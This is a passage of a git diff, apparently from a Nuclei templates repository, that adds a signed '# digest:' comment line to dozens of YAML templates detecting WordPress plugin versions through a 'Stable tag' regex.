a/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml b/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml index 39d269fb85..980cd6f356 100644 --- a/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221008feed2b7950f6c993b5ad57cbf88ba5c90fb7079b393f1c63015068fe6eb0b5c022100f176c115baddf72c30947d1a0f9dac1c43c6870d673f32a6de4e875906fa7f62:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml index fc126d83c6..aa162e1d1c 100644 --- a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml +++ b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100eff6b5a33cef429e0acb6ad98372cbea4e442b54cf4e2d48ec602343f90ccb94022031fd28390e05f5efa39cbd4b32395bed64efe8b20aafddaacb1abcf627a33a39:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sucuri-scanner.yaml b/http/technologies/wordpress/plugins/sucuri-scanner.yaml index 8c49a34259..299f33fb12 100644 --- a/http/technologies/wordpress/plugins/sucuri-scanner.yaml +++ b/http/technologies/wordpress/plugins/sucuri-scanner.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100b28fe478a4ad16bf8095e68b3f0e20734f30862413846e0ad505f7b49c22a35c02205567686f552113a8dd97c8361d2a30e73606311154abc67f7cc8718804b26be6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml index 6ac2212b4b..b8414082e7 100644 --- a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml +++ b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402204318ab8448ddf2dcb5346d4d490c03ec9fbee4ec84097cf9a7d39b0c14e44f3d02203927c07cf2386eedf4b22937ae4b38c7686bb69a90ba72230c3a66404487c372:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/tablepress.yaml b/http/technologies/wordpress/plugins/tablepress.yaml index 71c71b5ed1..deb89ccb20 100644 --- a/http/technologies/wordpress/plugins/tablepress.yaml +++ b/http/technologies/wordpress/plugins/tablepress.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100944ed51ae6eac9274eb2d6198fe14518a7d515ebe82b65aeaae644f4197214a102205be6a34296a68008a8a3eddc6c20e06bef0c67595f7bed0d23a31d3c1ff78d27:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml index 7b47adc274..8a239e3d2c 100644 --- a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml +++ b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502203c4c187ab800f0e487435afe58920fb2fc9a2e389b647635c91e5bdc5b9a1f9802210092b88cf586750e2b1e1d7015d683c45108f2589937dd71d75a5e2a60632cc8da:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/templately.yaml b/http/technologies/wordpress/plugins/templately.yaml index 286dfdaec6..70d8ce0139 100644 --- a/http/technologies/wordpress/plugins/templately.yaml +++ b/http/technologies/wordpress/plugins/templately.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502210083f6388dda2c5435cf1b084ce12cbc2cd467bb81b1471c299fea7e10f547f89f022036cd04204476d7f679f7d29d7c98889a9525a2b2c0bfb597e9b3be5829ef8921:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/the-events-calendar.yaml b/http/technologies/wordpress/plugins/the-events-calendar.yaml index c4928059f6..3a9b7cc765 100644 --- a/http/technologies/wordpress/plugins/the-events-calendar.yaml +++ b/http/technologies/wordpress/plugins/the-events-calendar.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502207888c79c3f8bbe037b4543e1a782c43e00f6d76c19d3a5f35e2623f6dac81c3d022100947616c4b48ec56ce324050fc28aa0ec6c8c995a4ddfb07fd7809ef36635e648:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/tinymce-advanced.yaml b/http/technologies/wordpress/plugins/tinymce-advanced.yaml index f6a7836f35..df36afbdf3 100644 --- a/http/technologies/wordpress/plugins/tinymce-advanced.yaml +++ b/http/technologies/wordpress/plugins/tinymce-advanced.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100d4f02764d9154f08527c0224bc1494ce4f3cc3467047c3f3b4d63ca8d761404502203c00dc71964c9d7b016491cb66e465e1fd56629096d6daeeec89b478e20311e4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml index b7af708c4f..7fc9cf64b6 100644 --- a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml +++ b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100bff3ed45d4b54188f141f5ca8918517cfbcf06817046ca3f2fd17f17434d26d602206186b206647d2950282f27df2e06b08c146bedcf53991d59ac7a54cf1a9c7360:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml index 61a793edf7..adc5fd0009 100644 --- a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502201045a0684f2a88ad02cc7cbca2ac865a77daed9a3d64ed69c8c363f6a9cd2666022100aa0d5c3a8df3743643b3f571b2bd26643ac71eb885a89c7b8be3a18622b44799:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/under-construction-page.yaml b/http/technologies/wordpress/plugins/under-construction-page.yaml index 0da88d5d3f..7e4a14a26e 100644 --- a/http/technologies/wordpress/plugins/under-construction-page.yaml +++ b/http/technologies/wordpress/plugins/under-construction-page.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221008e46c527c618f41d62f3110883f5c4b9a87da5529071fbd6c24c13084fbf9f2d022100b7ac2fb3dd1eb0de5e66d9db052dec9cfb47023d2ce634f2241fa638a52a1eda:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/updraftplus.yaml b/http/technologies/wordpress/plugins/updraftplus.yaml index 2b29428cf1..b29dafbe06 100644 --- a/http/technologies/wordpress/plugins/updraftplus.yaml +++ b/http/technologies/wordpress/plugins/updraftplus.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a0048304602210083b34d2da63ff39d24b7bbcbf2da8e6baf7c550a3690623fabc98e9fb393b5fc022100857950a86fa1feb415ff51963a866d87ce0bae4119ca197b4631406a65d947f0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/user-role-editor.yaml b/http/technologies/wordpress/plugins/user-role-editor.yaml index 181e619a7c..747ee6fd54 100644 --- a/http/technologies/wordpress/plugins/user-role-editor.yaml +++ b/http/technologies/wordpress/plugins/user-role-editor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100c9132ad3f6975103589a71e9d0579abcb47c49257cf422e88eeb5510120d887b02207ecdb74b70ab3c6e41d9c68ab0b8a756bd18acb069e25bc73b930ff55f79684b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/w3-total-cache.yaml b/http/technologies/wordpress/plugins/w3-total-cache.yaml index 8164eb4483..8dde0cbd95 100644 --- a/http/technologies/wordpress/plugins/w3-total-cache.yaml +++ b/http/technologies/wordpress/plugins/w3-total-cache.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100809e489f4e9c448c77440f3ec24d59c005fce9a22e2e68f6d722b3b7eb96d1eb022100908cd09e399b99a79710905216f50113be5fa262bf9651017ba359390ffc752c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml index 59554defdf..26bce0d694 100644 --- a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml +++ b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100d68200b74b9b1438a0c7a657c01af7f42bbe4db41245c63bc70356621cbfe857022100b70affe11b665a84b202b44c415690d663ec2ff186b5e8df7f97726a698bcb43:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/webp-express.yaml b/http/technologies/wordpress/plugins/webp-express.yaml index 350fd9436b..e705922a7d 100644 --- a/http/technologies/wordpress/plugins/webp-express.yaml +++ b/http/technologies/wordpress/plugins/webp-express.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220730e4285b5210b43dc311c864a61d513c5f13e17f9b7c9750364c140a0b4d4ae022100ee2144656ba5360582849462639dbf8e74a04969d49e19d5fef32ea55dfb807b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml index 2ae6bafbba..a9c4f0cc91 100644 --- a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml +++ b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100aac819c325389d9ed67b3f1d41a108e6cb2d28b8d800f268f38cc7a4414feaf702205f85552600b9fd738742ffe3bc4fbc76498f41462066862d849f22c559f3708d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml index d0dc8d92bb..8890a6b6b3 100644 --- a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml +++ b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100cf52bcf8a196b25652a1404dc9c8c6a3156253ef241351c4ab0913e3367e1c66022100df424e1e1057606ebcdd0ff2173b38a5f438d9c0ff4b398509995e3c2da9fa52:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml index c49bbc2b6d..260f2508d5 100644 --- a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml +++ b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402202945850999f3552bbb78728b7b5edf42da81d12ece6506db1224290f597820d9022013badff80366f3cca92ffed225bd5bfbcb77f8c5b04afc6df33e04bc46982ea1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml index 27586cbd9d..4c0967a2b6 100644 --- a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml +++ b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220277e2e2dd6915fca70235adae1866dac3ebef01922d26602b6c2e3748002dcca022002c4d600974d01ae651e31036f1b2564ff3c211473560e31634f09a80b998409:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml index 946272f0a9..96cb6610fa 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502200728bc8a0362dcc769b52c7b7d67a80e6ae9da86e680c05c31d4c74e9b29035702210087022e6c58987d2538b10f9f8b8a2eb5e880ff9185dbff9e303d97aa0f2d72dd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml b/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml index aa29706872..bf57279460 100644 --- a/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220517a18806f7d8c4920e2931a2f0240c13696c913882cbe4bced5918920a5c47a022100e43e5f3d7f040df5123fc582085b83c847959d44fb7fb5a4c7185ac681c25a6b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-payments.yaml index 290d53ab7e..29b3997ea9 100644 --- a/http/technologies/wordpress/plugins/woocommerce-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-payments.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502210093f18ddc5c92a66cc2dc7c82a3d0d6ddae985f60692e0b11435fd397d03115a50220039bd3e061b7e3e72e89663bd4d89e0504654d4553611cc5f0fa6674c0fd74e8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml index f7c9ef9b1f..e3182c7d0b 100644 --- a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100fa9530103e5692ea858b173e289b5094c8ec3aa6b5c77a85c810fed21800befc02210095182f5d1c0c86959fee75b5b8b99ee8c317608fe10cf03173a547f9b45d6d89:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml index f1c16275a2..b4f73a78c3 100644 --- a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402207254f45f7a919abeedc6971f4764f6f74024241c9ecaa6caf4e72eb95f70bf21022030644d099a60289f06120899d63e8d6ccf673ebd99732e104cfc8153b2a2c82a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-services.yaml b/http/technologies/wordpress/plugins/woocommerce-services.yaml index fc072e19d8..8521d21fd3 100644 --- a/http/technologies/wordpress/plugins/woocommerce-services.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-services.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221009c8485ac6ca3fec9aacfabfb79ae70dbc63c62ec8944226232e6089c0bb13d98022100a542ac00cea101fee8619daf68a95265484d09a9f2f30685108b033842dd9d96:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce.yaml b/http/technologies/wordpress/plugins/woocommerce.yaml index da9df0e8a5..1e90acced6 100644 --- a/http/technologies/wordpress/plugins/woocommerce.yaml +++ b/http/technologies/wordpress/plugins/woocommerce.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100bb8b5a2af4f171122c869e4248e05ea424df3e0a70e487f21e999553de4e3e2902210099a3e149120660a8bf7bc4b105325d64aee5d9a39dad3583330503be9c308c20:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordfence.yaml b/http/technologies/wordpress/plugins/wordfence.yaml index f8113d9750..96bce8e207 100644 --- a/http/technologies/wordpress/plugins/wordfence.yaml +++ b/http/technologies/wordpress/plugins/wordfence.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402206aa31f5a7c461fdb586f0f94616da0c544cbf572e816a0ee54dbd82584054acb0220362d2d059139dd50a13ddb18b9f34802273007a88dd69ef9b0af8b32ab6a7cb4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordpress-importer.yaml b/http/technologies/wordpress/plugins/wordpress-importer.yaml index 5f80282ab2..cbef84ab18 100644 --- a/http/technologies/wordpress/plugins/wordpress-importer.yaml +++ b/http/technologies/wordpress/plugins/wordpress-importer.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100b67a8eb3ab982444d972277721eaaa816034227cd7f1cec1e497da7f1ad93b8e022023421474ceb2f97861521f3234c6942e15cc70b31d69af39d39e1145f3130d35:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordpress-seo.yaml b/http/technologies/wordpress/plugins/wordpress-seo.yaml index 5725d5bb3f..76c9a9d881 100644 --- a/http/technologies/wordpress/plugins/wordpress-seo.yaml +++ b/http/technologies/wordpress/plugins/wordpress-seo.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100d98de5a5c82535d8a6be58a049e13e82de4bf6619b5d288752aab9a92fd6b0300220747e63b1e42496cd2897f8b0c2a4a51938c6e3d76389d6c14317afe3c79f35ac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/worker.yaml b/http/technologies/wordpress/plugins/worker.yaml index f67a8bc18a..280aedace7 100644 --- a/http/technologies/wordpress/plugins/worker.yaml +++ b/http/technologies/wordpress/plugins/worker.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100a6dc2274f62ace475d7a7fb78b71f801748b7db7179bba7d77c8de4f3fa2758402210085d262e944ef60d47d5845f776990d87b77b99a6538464fbff8d9a8293b1e715:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-crontrol.yaml b/http/technologies/wordpress/plugins/wp-crontrol.yaml index a773829b7d..b1adacc027 100644 --- a/http/technologies/wordpress/plugins/wp-crontrol.yaml +++ b/http/technologies/wordpress/plugins/wp-crontrol.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221009c8fce15b934e7492906a477dfec26fdb1dc36e123da155277acb51de8f44dc30221008acd82e317a5345f68eecd37dd89be30f900f8afe7de3a535d619534306162ad:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml index b9bd4be0a8..8568f474cf 100644 --- a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100eb01ea92204f91202b691d03988c80104f51f4c301df1bf665b0618d886f715202202d961c6f1b65c8190f471cec49ed7507bd9d122bb0857d5ede7301c7428fdd9b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-file-manager.yaml b/http/technologies/wordpress/plugins/wp-file-manager.yaml index bece4ce486..29e822a935 100644 --- a/http/technologies/wordpress/plugins/wp-file-manager.yaml +++ b/http/technologies/wordpress/plugins/wp-file-manager.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402207f04a0d8b53b7d072940afb5091605213420fdb54372d9ed19ce6197d62ac88c022027cbebaf625acb58698b1f7054f0dc4204367ab952b53dbd7b3e2a2ac1ed071f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-google-maps.yaml b/http/technologies/wordpress/plugins/wp-google-maps.yaml index 138b0aa9a6..4a519136bd 100644 --- a/http/technologies/wordpress/plugins/wp-google-maps.yaml +++ b/http/technologies/wordpress/plugins/wp-google-maps.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022073f80502456076e346d8eeebade48c26e985cc49c9f3498e1293e1982e5591b402204b962fb099854d4d9e0b13a75f5ab3994f71ff32227218346b21cff2ab08316e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml index 68bf71bc83..f735255758 100644 --- a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml +++ b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402202fba4b2fb6de0f83082992a68d7c5acee3ea4534dd585a69e0dda8f2b4cd7d21022019390c7e2583319dab432fac1816d936e16217cacf58a8bdacabbb735953b588:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml index 10dad2d2fb..e7d258b4a8 100644 --- a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml +++ b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502203df4bf94adfb5e0082834fea320c0f8052a9d7dee75c80319a1c39d489de5bd9022100c6964a74b39e78d74474e9995ba0e53e8773fdc133b2c69d086cf1a5813e66af:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-migrate-db.yaml b/http/technologies/wordpress/plugins/wp-migrate-db.yaml index e9efe6fb53..b9ffabff75 100644 --- a/http/technologies/wordpress/plugins/wp-migrate-db.yaml +++ b/http/technologies/wordpress/plugins/wp-migrate-db.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220167ed6516a0f74a949f0dbe52c3145bd82c0e9eff9fd5227045cd94d4f17fef302205c4ef23691dc3f7f97b81c094f6ad24e6fb300c00c58ed59a6199c491b3c731c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml index c3d10f0135..4832a8faed 100644 --- a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml +++ b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100cd4ec944e58c7c27a0896788f1537a52225b61398869a8ca0467899514113c70022100bfa57243f408e462a2d167b60c8b58826792f8ee7e40c3b6ff18f02cf21bc398:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-optimize.yaml b/http/technologies/wordpress/plugins/wp-optimize.yaml index 4a8bc6b75c..65862d2931 100644 --- a/http/technologies/wordpress/plugins/wp-optimize.yaml +++ b/http/technologies/wordpress/plugins/wp-optimize.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100927615d8efc9f8702cafd280686217ec2ffd22fe14b48221c6619a9803d810e202206555db4dc70105da4ed56aa99525ab68553157117137de414f40e3cc30ecc49a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-pagenavi.yaml b/http/technologies/wordpress/plugins/wp-pagenavi.yaml index d2c74355bd..d89766b178 100644 --- a/http/technologies/wordpress/plugins/wp-pagenavi.yaml +++ b/http/technologies/wordpress/plugins/wp-pagenavi.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022018dd08954dd0f4af713809da8bbc99edd3a3d0f5945b988bb034a96fdabce3b502206407b947b2b9571fe8419f7ef7069ba1e9da203fb5b062c1a0dc4c8733dd045f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-reset.yaml b/http/technologies/wordpress/plugins/wp-reset.yaml index 94b8494b08..7c06b24278 100644 --- a/http/technologies/wordpress/plugins/wp-reset.yaml +++ b/http/technologies/wordpress/plugins/wp-reset.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502201544db8b5f1524a0a026f669a511aa6f1c66ea3304cb0cf8b6b965565846e174022100e4933a318d244f78d0b6063c6ceac1b4ef2707a6b4799ae4f4b74e2f3b1ec999:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml index 108aba79e9..7507d80ecb 100644 --- a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml +++ b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100df001779331528ac6b79e581d26f847265f77a859949dc7e27a3ed43cad8860c022100b700fd203160394646a6caddfdf6a65bfabadf206840c7c259240977eb57ccba:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-rollback.yaml b/http/technologies/wordpress/plugins/wp-rollback.yaml index f6f6bf5566..0f1b890c5c 100644 --- a/http/technologies/wordpress/plugins/wp-rollback.yaml +++ b/http/technologies/wordpress/plugins/wp-rollback.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100ee2abb89b1b3c7d85d4eeb4ab129a0f411ef313d7b204b308a875994c8112a6a02206493cb51eae3e8f24635456dcf509d1f10a2036064b401fc641e3d04b7a6a917:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-seopress.yaml b/http/technologies/wordpress/plugins/wp-seopress.yaml index 483cb7cac7..c1faa80403 100644 --- a/http/technologies/wordpress/plugins/wp-seopress.yaml +++ b/http/technologies/wordpress/plugins/wp-seopress.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100e75dd699176aa90e335485e5a8139bf6402269eb9e9f692cc4d7d67237659f40022100a14dd1825698696c1abf02dc210f9a79b3d9d583a317dddc6a287f5b5979febc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml index a132c98df4..16299c0c33 100644 --- 